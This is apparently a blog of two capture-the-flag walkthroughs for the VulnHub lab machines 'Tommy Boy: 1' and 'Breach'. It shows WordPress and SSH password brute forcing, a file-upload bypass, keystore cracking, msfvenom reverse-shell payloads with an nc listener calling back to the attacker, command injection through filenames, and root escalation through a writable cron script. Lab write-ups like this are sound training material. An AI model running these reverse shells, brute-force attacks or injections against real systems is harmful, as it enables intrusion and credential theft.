Tommy Boy: 1

Huge thanks to Brian Johnson for this fun vm

Vulnhub

As usual we start with an nmap scan

Everytime I see a website i run dirb and nikto on it ,but the first thing i check is the robots.txt

from the robots.txt we can see

/flag-numero-uno.txt

Browsing to the url http://192.168.0.102/flag-numero-uno.txt

This is the first of five flags in the Callhan Auto server. You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Checking the Webpage

Checking the source code of the page reveal an interesting youtube video.

Browsing the youtube video reveal the word prehistoric forest

We can try to fetch http://192.168.0.102/prehistoricforest/
This is a wordpress server!

From enumerating manually the server we can see there is a comment that require a password that has been set by richard

Richard, what’s the password you put on that protected blog post?

Also its a wordpress so lets check if there are any vulnerabilities

So we run wpscan on it.

From enumerating we can see some users and can try to bruteforce their password.

wpscan -u 192.168.0.102/prehistoricforest/ --enumerate u

[+] Identified the following 4 user/s:
+----+----------+-------------------+
| Id | Login | Name |
+----+----------+-------------------+
| 1 | richard | richard |
| 2 | tom | Big Tom |
| 3 | tommy | Tom Jr. |
| 4 | michelle | Michelle Michelle |
+----+----------+-------------------+
wpscan -u 192.168.0.102/prehistoricforest/ --username tom --wordlist usr/share/wordlists/rockyou.txt

We bruteforce the user tom and password is tomtom1

On the wordpress there is the FLag#2 thisisthesecondflagyayyou.txt

curl http://192.168.0.102/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

 

From enumerating the wordpress we can see that tom left a message to try to remember his password

Because we know the second part for his ssh password

I used these commands to generate a list of valid password because i did’nt know the password length i would need to generate all wordlist by hand.

crunch 9 9 -t '@@@1938!!' -o tommy.txt
hydra -l tom -P tommy.txt 192.168.0.102 ssh -V

While this was bruteforcing the user tom on ssh, i enumerated the wordpress more.

There was a reference to the richard directory on the website, wich had a picture of Richard

http://192.168.0.102/prehistoricforest/richard/

running exiftool on shockedrichard revealed

User Comment : ce154b5a8e59c89732bc25d6a2e6b90b

Quick googling for this hash revealed the password is spanky

There was a wordpress comment that needed a password to be seen. When i tried spanky the following comment was available to read.

Michelle/Tommy,This is f’d up.I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:Hey Richy,So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.Here’s everything I know:

You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

 

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

From previous scanning we know there is a port running on port 8008 it is the Nick’s web server.

We can now fetch http://192.168.0.102:8008/NickIzL33t/

But on this page there is nothing, but a hint ( Only me and Steve Jobs can see this content)

So i changed my useragent to something apple related ( I used a firefox addon for conveniance but i tested the user agent with burpsuite)

Apple-iPhone/501.347

With this useragent i managed to fetch the webpage NickIzL33t only to tell me i would need to know the webpage ending in .html .

So i fired up dirbuster to try and fetch the .html but dirbuster always seemed to crash with the rockyou.txt wordlist.
So i used burpsuite to bruteforce the .html and i found that the hidden html is fallon1.html

we can download the hint to crack the zip file, the zipfile and the 3rd flag!.

http://192.168.0.102:8008/NickIzL33t/flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

From checking the source we can see there is a link to an upload image.

http://192.168.0.102:8008/NickIzL33t/P4TCH_4D4MS/upload.php

If we just rename our php file to .gif we can upload directly on the server and have code execution 🙂

For cracking the zip file earlier found

crunch 13 13 -t bev,%%@@^1995 -o tomwlist.txt

This will create a wordlist with that would fit the description of nick

fcrackzip -D -p ./Nick/tomwlist.txt -u t0msp4ssw0rdz.zip -v

unzipping the zip gives us a file passwords.txt containing

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

since we already know the second part of the password “1938!!” (from the wordpress post)

we can login with the user bigtommysenior and password “fatguyinalittlecoat1938!!”

ssh bigtommysenior@192.168.0.102 (password = fatguyinalittlecoat1938!! )

Once we loggin into the ssh

cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt

I quickly checked if my user had access but the file is owned by www-data and since i already uploaded a malicious php i already have a shell as www-data from the image upload bypass 🙂

 

cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

So we just need to concatenate all flags 🙂

1st Flag : B34rcl4ws # From robots.txt
2nd Flag : Z4l1nsky # From WordPress
3rd Flag : TinyHead # From Nick’s web service
4th Flag : EditButton #From SSH
5th Flag : Buttcrack #From Getting a shell as www-data

So the Password for the LOOT.zip should be

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Fun VM

What i learned,
1. I learned some new options in dirbuster for bruteforcing only .html and adding a user agent.
2. I learned how to use crunch efficiently to generate a custom wordlist that fits my needs
3. I learned how to use burpsuite as a bruteforcer that you completely have the control

Thank you for reading this!

Advertisements

Breach

First we start with a nmap scan but it took really too long to enumerate it,
So i tried browsing to the ip and found a website there so i started nikto and dirb

Decoding this string in base64 gives us

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
pgibbons:damnitfeel$goodtobeagang$ta

#TODO Where is the pcap located on the website

From checking the source code of the web application i found a strange string that looked like base64 and it gave me a user/password to login into the impresscms

when i found the keystore i downloaded a tool to bruteforce the password because i needed the private key to be in a differente, to be able to export it in wireshark to decrypt the pcap

https://github.com/bes/KeystoreBrute

While this worked i tried to be smart about it and did a string on the keyfile wich revealed the word “tomcat” so i tried it as password and it worked!

after finding the password is tomcat

keytool -importkeystore toretype JKS -deststoretype PKCS12 -destkeystore keystore.p12
export the private key from the p12
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem
This decrypt the pcap

Authorization Basic
tomcat:Tt\5D8F(#!*u=G)4m7zB

After searching a LONG time on how to connect to the tomcat service, firefox doesnt work netcat either i found out you can do that with openssl

openssl s_client -connect 192.168.110.140:8443
After debugging the openssl for hours i decided to try with another browser than firefox, i was able to reach the tomcat server with edge!

We can login with the credentials found in the pcap

Because we are admin of the tomcat we can upload a malicious file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see name of jsp to call

inflated: zhawsspalj.jsp
nc -lvp 443
https://192.168.110.140:8443/shell/zhawsspalj.jsp

sfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf breachmeter.elf

While enumerating the system i found there isnt a root password for mysql, so i dumped all the database, and found the md5 hash for the user milton

submitting this hash to crackstation revealed the password is thelaststraw

checking the logs on this server revealed
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/tidyup.sh)

After trying to inject bash command into the script because i control the destination i found a way to bypass the script so it doesnt delete my file because he doesn’t handle space.
I tried injecting command with a filename like a&&wget 192.168.110.110 so the command that would pass into th shell would be
rm -rf swingline/a&&get 192.168.110.110 wich would execute the command.

I banged my head for about two days trying to exploit via this method
I found something usefull on the internet on how to inject arguments without spaceuo
{ls,-larth}
Even this didn’t work so i did what i had learned best while doing my oscp, Try Harder! (If you are stuck somwhere restart your enumeration from scratch)
While restarting my enumeration i came across a comment in one of the images of the website while running exiftool on it.

It had the comment “cofeestains”
at
From remembering my enumeration i knew there was another user on the system that didn’t seems to interract with it (no trace of him in the logs and nothing in his home directory) his name is blumbergh. I had already tried some basics passwords on the account, but this time i tried with the new information.

su blumbergh // coffeestains

I was in!

Since i though he was the server administrator because he wouldnt need to write anything in his home directory if we can be root.

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Okay we dont have all the sudo privilege but we can modify tidyup.sh!

cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh
from now we just wait for a connection with our metasploit handler.

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

we then get a shell as root! Finally 🙂

root@Breach:/root# cat .flag.txt
cat .flag.txt
———————————————————————————–

______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/’ |______| | | |__ ___| |__ _ __ __| |
| ___ \ ‘__/ _ \/ _` |/ __| ‘_ \ | | | /| |______| | | ‘_ \ / _ \ __| ‘_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

———————————————————————————–
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.